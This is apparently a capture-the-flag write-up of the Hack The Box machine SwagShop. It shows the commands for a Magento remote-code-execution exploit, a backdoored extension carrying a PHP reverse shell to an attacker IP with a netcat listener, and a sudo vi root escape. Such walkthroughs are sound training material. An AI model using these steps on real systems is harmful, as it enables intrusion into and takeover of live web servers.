This post documents the complete walkthrough of SwagShop, an active vulnerable VM created by ch4p and hosted at Hack The Box
Description |
SwagShop is a retired GNU/Linux eCommerce web server using an outdated/unpatched version of Magento with known vulnerabilities and exploits. The Linux system allows the Apache user to run a sudo command with no password required, allowing privilege escalation to root. |
❯ Information Gathering
Starting with a Nmap
scan
1•➜ nmap -sV -sC -oA namp 10.10.10.1402...3 └> PORT STATE SERVICE VERSION4 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)6 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))7 |_http-server-header: Apache/2.4.18 (Ubuntu)8 |_http-title: Home page Service Info: OS: Linux;
From the SSH flag, we guessed this box to be Ubuntu Xenial and Nmap
finds 80/tcp
open.
❯ Web Pages Enumeration
Going to http://10.10.10.140
in the browser
we find a Magento
shop with some HTB swag available.The pages are copyrighted from 2014, We can see at this page that the last released version in 2014 was 1.9.x.
Browsing around, you will notice that the items are placed under a folder called index.php/
(http://10.10.10.140/index.php/)
by running two GoBuster
scans on http://10.10.10.140/
and http://10.10.10.140/index.php/
we find the admin panel at http://10.10.10.140/index.php/admin/
And http://10.10.10.140/downloader/
to access Magento
Connect Manager. You can upload new
Magento
packages, which contains PHP files inside.
❯ Exploitation
We use searchsploit
to find exploits in Magneto 1.9.x
and we notice a remote code execution exploit
Exploit Title | Path (/usr/share/exploitdb/) |
Magento eCommerce - Remote Code Execution | exploits/xml/webapps/37977.py |
We need to tweak the exploit a little for the odd $IP/index.php/admin
requirement instead of $IP/admin
1...2target = "http://10.10.10.140/"34if not target.startswith("http"):5 target = "http://" + target67if target.endswith("/"):8 target = target[:-1]910target_url = target + "/index.php" + "/admin/Cms_Wysiwyg/directive/index/"11...
we run the script
1• ➜ python 37977.py2 └> WORKED3 Check http://10.10.10.140/admin with creds forme:forme
now we can log in to the admin panel http://10.10.10.140/index.php/admin
and http://10.10.10.140/downloader
with creds forme:forme
❯ Getting a Reverse Shell
Using the Magento
Downloader/Magento
Connect, we attempt to upload an
extension with a PHP reverse shell.
Download any legit Magento
package, we’ll use LavaMagentoBD
from GitHub/P34C3-07/LavaMagentoBD then extract lavamagento_bd.tgz
we’ll have to modify its contents.
1•➜ tar -xzvf lavalamp_magento_bd.tgz
edit the file ./App/code/community/Lavalamp/Connector/controllers/IndexController.php
and replace its contents with a PHP reverse shell, we’ll use PHP-Reverse-Shell from Github/pentestmonkey/php-reverse-shell make sure to change the $IP
field to your IP address. we will use port 1234
1$ip = '10.10.14.115'; // CHANGE THIS2$port = 1234;
get the MD5
hash for the file
1• ➜ md5sum ./App/code/community/Lavalamp/Connector/controllers/IndexController.php2└> 7587816c42712b0c9fe6dccb2c6c5300 IndexController.php
copy it then edit package.xml
and replace IndexController.php
hash
1<dir name="controllers">2 <file hash="7587816c42712b0c9fe6dccb2c6c5300"3 name="IndexController.php"/>4 </dir>
compress the files back into .tgz
file
1•➜ tar -cvzf lavalamp_magento_bd.tgz -c ./*
then upload the file to http://10.10.10.140/downloader/
login with creds forme:forme
if the extension is loaded successfully you should see
start listening using netcat
1•➜ nc -v -n -l -p 1234
then in the browser navigate to http://10.10.10.140/app/code/community/Lavalamp/Connector/controllers/IndexController.php
in the terminal you should see that we got a reverse shell
1•➜ nc -nvlp 12342└> listening on [any] 1234 ...3 connect to [<IP>] from (UNKNOWN) [10.10.10.140] 446504 Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP x86_64 GNU/Linux5 13:22:28 up 32 min, 0 users, load average: 4.31, 2.61, 1.866 USER TTY FROM [email protected] IDLE JCPU PCPU WHAT7 uid=33(www-data) gid=33(www-data) groups=33(www-data)8 /bin/sh: 0: can't access tty; job control turned off
we are connected now with the username www-data
, but we still need to spawn a bash shell with tty
1$ python -c 'import pty; pty.spawn("/bin/bash")'
❯ Own User
Now that we have a shell on the box we can view etc/passwd
1•➜ [email protected]:/$ cat /etc/passwd2└> cat /etc/passwd3 root:x:0:0:root:/root:/bin/bash4 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin5 bin:x:2:2:bin:/bin:/usr/sbin/nologin6 sys:x:3:3:sys:/dev:/usr/sbin/nologin7 sync:x:4:65534:sync:/bin:/bin/sync8 games:x:5:60:games:/usr/games:/usr/sbin/nologin9 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin10 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin11 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin12 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin13 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin14 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin15 www-data:x:33:33:www-data:/var/www:/bin/bash16 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin17 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin18 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin19 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:...20 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin21 systemd-timesync:x:100:102:systemd Time Synchronization,,,:...22 systemd-network:x:101:103:systemd Network Management,,,:...23 systemd-resolve:x:102:104:systemd Resolver,,,:...24 systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/...25 syslog:x:104:108::/home/syslog:/bin/false26 _apt:x:105:65534::/nonexistent:/bin/false27 lxd:x:106:65534::/var/lib/lxd/:/bin/false28 mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false29 messagebus:x:108:112::/var/run/dbus:/bin/false30 uuidd:x:109:113::/run/uuidd:/bin/false31 dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false32 sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin33 haris:x:1000:1000:haris,,,:/home/haris:/bin/bash
we notice the user haris
1•➜ [email protected]:/$ ls -alh /home/haris2└> ls -alh /home/haris3 total 36K4 drwxr-xr-x 3 haris haris 4.0K May 8 09:21 .5 drwxr-xr-x 3 root root 4.0K May 2 14:48 ..6 -rw------- 1 haris haris 54 May 2 14:56 .Xauthority7 lrwxrwxrwx 1 root root 9 May 8 09:20 .bash_history -> /dev/null8 -rw-r--r-- 1 haris haris 220 May 2 14:48 .bash_logout9 -rw-r--r-- 1 haris haris 3.7K May 2 14:48 .bashrc10 drwx------ 2 haris haris 4.0K May 2 14:49 .cache11 -rw------- 1 root root 1 May 8 09:20 .mysql_history12 -rw-r--r-- 1 haris haris 655 May 2 14:48 .profile13 -rw-r--r-- 1 haris haris 0 May 2 14:49 .sudo_as_admin_successful14 -rw-r--r-- 1 haris haris 33 May 8 09:01 user.txt
we find user.txt
1•➜ [email protected]:/$ cat /home/haris/user.txt2└> cat /home/haris/user.txt3 <user flag>
❯ Privilege Escalation: Own Root
Enumerating the system leads to the finding that sudo -l
returns the
list of the user’s privileges, and shows that running vi
with a specific path /var/www/html/*
grants superuser privileges, without a password entry, required
1•➜ [email protected]:/$ sudo -l2└> sudo -l3 Matching Defaults entries for www-data on swagshop:4 env_reset, mail_badpass,5 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\6 :/sbin\:/bin\:/snap/bin78 User www-data may run the following commands on swagshop:9 (root) NOPASSWD: /usr/bin/vi /var/www/html/*
open a file using vi
in /var/www/html/*
1•➜ [email protected]:/$ sudo /usr/bin/vi /var/www/html/Bad3r.sh2└> sudo /usr/bin/vi /var/www/html/Bad3r.sh3 Vim: Warning: Output is not to a terminal4 Vim: Warning: Input is not from a terminal56 E558: Terminal entry not found in terminfo7 ‘unknown’ not known. Available builtin terminals are:8 builtin_amiga9 builtin_beos-ansi10 builtin_ansi11 builtin_pcansi12 builtin_win3213 builtin_vt32014 builtin_vt5215 builtin_xterm16 builtin_iris-ansi17 builtin_debug18 builtin_dumb19 defaulting to ‘ansi’
inside vi
you can spawn a root shell
1:!/bin/bash2~3~
in the interactive shell, we can get the root flag
1•➜ whoami2└> root3•➜ cat /root/root.txt4 <root flag>5 ___ ___6 /| |/|\| |\7 /_| ´ |.` |_\ We are open! (Almost)8 | | . | |9 | --- | --- | --------------------------------- |10 | | . | Join the beta HTB Swag Store! |11 | ___ | .__ | https://hackthebox.store/password |1213 PS: Use root flag as password!